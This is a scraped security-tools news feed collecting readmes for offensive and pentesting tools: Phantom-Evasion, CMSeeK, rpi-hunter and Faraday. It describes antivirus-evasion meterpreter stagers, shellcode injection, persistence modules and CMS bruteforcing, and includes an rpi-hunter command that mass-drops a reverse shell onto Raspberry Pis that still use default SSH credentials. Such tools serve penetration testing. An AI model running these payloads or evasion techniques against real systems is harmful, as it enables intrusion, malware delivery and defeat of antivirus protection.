    • If workers do not have enough RAM, then there will be excessive memory errors
    • Big files (especially compressed files) require more RAM
    • In large clusters, diminishing returns begin above 4GB RAM per worker
  • Allocate as much RAM as reasonable to the broker
    • ZMQ messages are stored entirely in memory -- in large deployments with many clients, the broker may use a lot of RAM if the workers cannot keep up with the number of file tasks

Sizing Considerations
Multiple variables should be considered when determining the appropriate size for a cluster:
  • Number of file requests per second
  • Type of file requests
    • Remote file requests take longer to process than direct file requests
  • Diversity of files requested
    • Binary files take longer to scan than text files
  • Number of YARA rules deployed
    • Scanning a file with 50,000 rules takes longer than scanning a file with 50 rules
The best way to properly size a cluster is to start small, measure performance, and scale out as needed.

Docker Considerations
Below is a list of considerations to keep in mind when running a cluster with Docker containers:
  • Share volumes, not files, with the container
    • Strelka's workers will read configuration files and YARA rules files when they startup -- sharing volumes with the container ensures that updated copies of these files on the localhost are reflected accurately inside the container without needing to restart the container
  • Increase stop-timeout
    • By default, Docker will forcibly kill a container if it has not stopped after 10 seconds -- this value should be increased to greater than the shutdown_timeout value in etc/strelka/strelka.yml
  • Increase shm-size
    • By default, Docker limits a container's shm size to 64MB -- this can cause errors with Strelka scanners that utilize tempfile
  • Set logging options
    • By default, Docker has no log limit for logs output by a container

Management
Due to its distributed design, we recommend using container orchestration (e.g. Kubernetes) or configuration management/provisioning (e.g. Ansible, SaltStack, etc.) systems for managing clusters.


Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

$
0
0

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.

The following OSs officialy support automatic setup:
  1. Kali Linux Rolling 2018.1+ (64 bit)
  2. Parrot Security (64 bit)
The following OSs are likely able to run Phantom Evasion through manual setup:
  1. Arch Linux (64 bit)
  2. BlackArch Linux (64 bit)
  3. Elementary (64 bit)
  4. Linux Mint (64 bit)
  5. Ubuntu 15.10+ (64 bit)
  6. Windows 7/8/10 (64 bit)

Contributors
Special thanks to:
phra https://github.com/phra
stefano118 https://github.com/stefano118

Getting Started
Simply git clone or download and unzip Phantom-Evasion folder

Kali Linux:
Automatic setup officially supported, open a terminal and execute phantom-evasion:
sudo python phantom-evasion.py 
or:
sudo chmod +x ./phantom-evasion.py

sudo ./phantom-evasion.py

Dependencies (only for manual setup)
  1. metasploit-framework
  2. mingw-w64 (cygwin on windows)
  3. gcc
  4. apktool
  5. strip
  6. wine (not necessary on windows)
  7. apksigner
  8. pyinstaller
require libc6-dev-i386 (linux only)

WINDOWS PAYLOADS

Windows Shellcode Injection Modules (C)
Msfvenom windows payloads and custom shellcodes supported
(>) Randomized junkcode and windows antivirus evasion techniques
(>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section)
(>) Decoy Processes Spawner available (see Decoy Process Spawner section)
(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))
(>) Execution time range:35-60 second
  1. Windows Shellcode Injection VirtualAlloc: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API.
  2. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  3. Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  4. Windows Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API.
  5. Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  6. Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  7. Windows Shellcode Injection Process inject: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API.
  8. Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  9. Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.
  10. Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API.
  11. Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API.
  12. Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API.

Windows Pure C meterpreter stager
Pure C polymorphic meterpreter stagers compatible with msfconsole and cobalt strike beacon.(reverse_tcp/reverse_http)
(>) Randomized junkcode and windows antivirus evasion techniques (>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 second
  1. C meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual)
  2. C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap)
  3. C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (rrequire multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual , API loaded at runtime)
  4. C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) -- windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap , API loaded at runtime)
  5. C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Virtual)
  6. C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Heap)
  7. C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime)
  8. C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) -- windows/x64/meterpreter/reverse_http (if x64) , memory:Heap , API loaded at runtime)
  9. C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64) , memory:Virtual)
  10. C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64) , memory:Heap)
  11. C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64) , API loaded at runtime)
  12. C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) -- windows/x64/meterpreter/reverse_https (if x64) , memory:Heap , API loaded at runtime)

Powershell / Wine-Pyinstaller modules
Powershell modules:
(>) Randomized junkcode and windows antivirus evasion techniques (>) Decoy Process Spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 second
  1. Windows Powershell/Cmd Oneliner Dropper: Require user-supplied Powershell/Cmd oneliner payload (example Empire oneliner payload). Generate Windows powershell/Cmd oneliner dropper written in c. Powershell/Cmd oneliner payload is executed using system() function.
  2. Windows Powershell Script Dropper: Both msfvenom and custom powershell payloads supported. (32 bit powershell payloads are not compatible with 64 bit powershell target and vice versa.) Generate Windows powershell script (.ps1) dropper written in c. Powershell script payload is executed using system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File "PathTops1script").
Wine-Pyinstaller modules:
(>) Randomized junkcode and windows antivirus evasion techniques (>) Execution time range:5-25 second (>) Require python and pyinstaller installed in wine.
  1. Windows WinePyinstaller Python Meterpreter
Pure python meterpreter payload.
  1. WinePyinstaller Oneline payload dropper
Pure python powershell/cmd oneliner dropper.
Powershell/cmd payload executed using os.system().

LINUX PAYLOADS

Linux Shellcode Injection Module (C)
Msfvenom linux payloads and custom shellcodes supported.
(>) Randomized junkcode and C antivirus evasion techniques (>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:20-45 second
  1. Linux Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using mmap and memcpy.
  2. Linux Bash Oneliner Dropper: Execute custom oneliner payload using system() function.

OSX PAYLOADS
  1. OSX 32bit multi-encoded:
Pure msfvenom multi-encoded OSX payloads.

ANDROID PAYLOADS
  1. Android Msfvenom Apk smali/baksmali:
(>) Fake loop injection (>) Goto loop
Android msfvenom payloads modified an rebuilded with apktool (Also capable of apk backdoor injection).

UNIVERSAL PAYLOADS
Generate executable compatible with the OSs used to run Phantom-Evasion.
  1. Universal Meterpreter increments-trick
  2. Universal Polymorphic Meterpreter
  3. Universal Polymorphic Oneliner dropper

POST-EXPLOITATION MODULES
  1. Windows Persistence RegCreateKeyExW Add Registry Key (C) This modules generate executables which needs to be uploaded to the target machine and excuted specifing the fullpath to file to add to startup as arguments.
  2. Windows Persistence REG Add Registry Key (CMD) This module generate persistence cmdline payloads (Add Registry Key via REG.exe).
  3. Windows Persistence Keep Process Alive This module generate executable which need to be uploaded to the target machine and executed. Use CreateToolSnapshoot ProcessFirst and ProcessNext to check if specified process is alive every X seconds. Usefull combined with Persistence N.1 or N.2 (persistence start Keep process alive file which then start and keep alive the specified process)
  4. Windows Persistence Schtasks cmdline
This modules generate persistence cmdline payloads (using Schtasks.exe).
  1. Windows Set Files Attribute Hidden
hide file through commandline or with compiled executable (SetFileAttributes API)

Warning
PYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!

Decoy Processes Spawner:
During target-side execution this will cause to spawn (Using WinExec or CreateProcess API) a maximum of 4 processes consequentialy. The last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code.
PRO: Longer execution time,Lower rate of detection. CONS: Higher resource consumption.

Multibyte Xor Encoder:
C xor encoders with three pure c decoding stub available with Shellcode Injection modules.
  1. MultibyteKey xor:
Shellcode xored with one multibyte (variable lenght) random key. Polymorphic C decoder stub.
  1. Double Multibyte-key xor:
Shellcode xored with the result of xor between two multibyte (variable lenght) random keys Polymorphic C decoder stub.
  1. Triple Multibyte-key xor:
Shellcode xored with the result of xor between two multibyte (variable lenght) random keys xored with a third multibyte random key. Polymorphic C decoder stub.


Faraday v3.6 - Collaborative Penetration Test and Vulnerability Management Platform

$
0
0

Here are the main new features and improvements in Faraday v3.6:

Welcome Service Now
A new way to send vulnerabilities is available! We integrated Faraday with Service Now, giving you more options to work with.



Burp plugin was totally revamped 
We have been working hard to make several changes to enhance your daily workflow:


  • Burp plugin that uses the Faraday server API, so you don't have to use the GTK client
  • The plugin was rewritten in Java
  • We added 2FA support to increase security

We empowered Jira integration 
Can you imagine sending multiple vulns to Jira without filling the form out every time? With Faraday v3.6 now you can!

With this integration, you don’t have to connect your Jira credentials every time you use it, just do it once and you’re ready to go. You also have the option to override default settings and switch projects or username.

Jira is one of our most important integrations and we want to help you to get the most out of it.



Learn more about your vulns to mitigate them better

In this new version, we added more fields to enrich the Vulnerability Templates, hopefully improving an important part of your daily workflow. This new feature allows you to have all the data you need in one place.

Added  fields
  • 'impact',
  • 'easeofresolution' 
  • 'policyviolations'

Other plugins updated in this version
  • Netsparkers
  • SQLMap
  • Dnsmap
  • SSLyze 
  • Nessus 
  • Goohost


CMSeeK v1.1.1 - CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 150 Other CMSs)

$
0
0

What is a CMS?
A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.

Release History
- Version 1.1.1 [01-02-2019]
- Version 1.1.0 [28-08-2018]
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
...
Changelog File

Functions Of CMSeek:
  • Basic CMS Detection of over 155 CMS
  • Drupal version detection
  • Advanced Wordpress Scans
    • Detects Version
    • User Enumeration
    • Plugins Enumeration
    • Theme Enumeration
    • Detects Users (3 Detection Methods)
    • Looks for Version Vulnerabilities and much more!
  • Advanced Joomla Scans
    • Version detection
    • Backup files finder
    • Admin page finder
    • Core vulnerability detection
    • Directory listing check
    • Config leak detection
    • Various other checks
  • Modular bruteforce system
    • Use pre made bruteforce modules or create your own and integrate with it

Requirements and Compatibility:
CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.

Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
  • git clone https://github.com/Tuhinshubhra/CMSeeK
  • cd CMSeeK
  • pip/pip3 install -r requirements.txt
For guided scanning:
  • python3 cmseek.py
Else:
  • python3 cmseek.py -u <target_url> [...]
Help menu from the program:
USAGE:
python3 cmseek.py (for a guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, -list LIST path of the file containing list of sites
for multi-site scan (comma separated)
RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)

USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent

OUTPUT:
-v, --verbose Increase output verbosity

VERSION & UPDATING:
--update Update CMSeeK (Requires git)
--version Show CMSeeK version and exit

HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result

EXAMPLE USAGE:
python3 cmseek.py -u example.com # Scan example.com
python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated)
python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here
python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent
python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com

Checking For Update:
You can check for update either from the main menu or use python3 cmseek.py --update to check for update and apply auto update.
P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.

Detection Methods:
CMSeek detects CMS via the following:
  • HTTP Headers
  • Generator meta tag
  • Page source code
  • robots.txt

Supported CMSs:
CMSeeK currently can detect 157 CMS. Check the list here: cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way:
 cmsID = {
'name':'Name Of CMS',
'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}

Scan Result:
All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.
Here is an example of the json report log:


Bruteforce Modules:
CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:
  1. Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex
  2. Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module
  3. Copy and paste the module in the brutecms directory under CMSeeK's directory
  4. Open CMSeeK and Rebuild Cache using U as the input in the first menu.
  5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.


Need More Reasons To Use CMSeeK?
If not anything you can always enjoy exiting CMSeeK (please don't), it will bid you goodbye in a random goodbye message in various languages.
Also you can try reading comments in the code those are pretty random and weird!!!

Screenshots:

Main Menu


Scan Result

WordPress Scan Result

Guidelines for opening an issue:
Please make sure you have the following info attached when opening a new issue:
  • Target
  • Exact copy of error or screenshot of error
  • Your operating system and python version
Issues without these informations might not be answered!

Follow @r3dhax0r:
Twitter

Team:
Team : Virtually Unvoid Defensive (VUD)


Rpi-Hunter - Automate Discovering And Dropping Payloads On LAN Raspberry Pi's Via SSH

$
0
0

Automate discovering and dropping payloads on LAN Raspberry Pi's via ssh.


rpi-hunter is useful when there are multiple Raspberry Pi's on your LAN with default or known credentials, in order to automate sending commands/payloads to them.

GUIDE:

Installation
  1. Install dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpass
  2. Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  3. Navigate to rpi-hunter: cd ./rpi-hunter
  4. Make rpi-hunter.py executable: chmod +x rpi-hunter.py
  • One line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Usage
usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT]
[--safe] [-q]

optional arguments:
-h, --help show this help message and exit
--list List available payloads
--no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh'ing
-c CREDS Password to use when ssh'ing
--payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or 'whoami']
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
--safe Print sshpass command, but don't execute it
-q Don't print banner
  • Example usage: ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
  • Run ./rpi-hunter.py --list to see avalible payloads.
  • Payloads can be specified by the payload name from --list or as raw input
    • ex. --payload reverse_shell or --payload [your cli command here]


Viewing all 5837 articles
Browse latest View live